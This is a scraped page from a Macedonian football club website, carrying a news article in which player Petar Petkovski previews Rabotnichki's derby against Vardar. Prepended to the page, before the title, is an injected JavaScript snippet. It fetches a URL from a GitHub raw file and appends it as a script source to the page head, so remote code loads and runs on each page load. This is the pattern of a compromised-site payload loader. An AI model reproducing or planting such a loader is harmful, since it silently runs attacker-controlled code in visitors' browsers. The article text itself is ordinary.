;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Петковски: Вардар е најголемиот бренд, но и ние имаме најголем мотив за победа
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Петковски: Вардар е најголемиот бренд, но и ние имаме најголем мотив за победа

Работнички утре (15 часот) ќе ги одмери силите против Вардар во рамките на 30.коло од Првата фудбалска лига. Соседското дерби секогаш привлекува дополнително внимание, а овојпат младинскиот репрезентативец Петар Петковски, кој во минатото го носеше „црвено-црниот“ дрес, ќе биде на страната на Работнички. Тој очекува возбудлив и неизвесен натпревар, но и позитивен исход за нашиот клуб.

„Дерби натпреварите меѓу Работнички и Вардар секогаш носат дополнителна возбуда. Не е важна моментната форма, мотивите се секогаш максимални. Вардар е најголемиот бренд во македонскиот фудбал, но и затоа сите други имаат најголеми мотиви да го победат. Сега сум член на Работнички и секако дека ќе дадам се од себе да оствариме позитивен резултат на утрешниот дуел. Атмосферата во тимот е одлична по триумфот над Пелистер и се надеваме дека ќе продолжиме со добри игри и во продолжението од шампионатот. Бодовите ни се потребни во трката за излез на европска сцена и ќе сториме се за да ги освоиме“, вели Петар Петковски.

Натпреварот меѓу Вардар и Работнички ќе се одигра утре, со почеток во 15 часот, а ќе биде директно пренесуван на Телевизија 24. Главен судија на натпреварот ќе биде Димитар Мечкаровски од Скопје.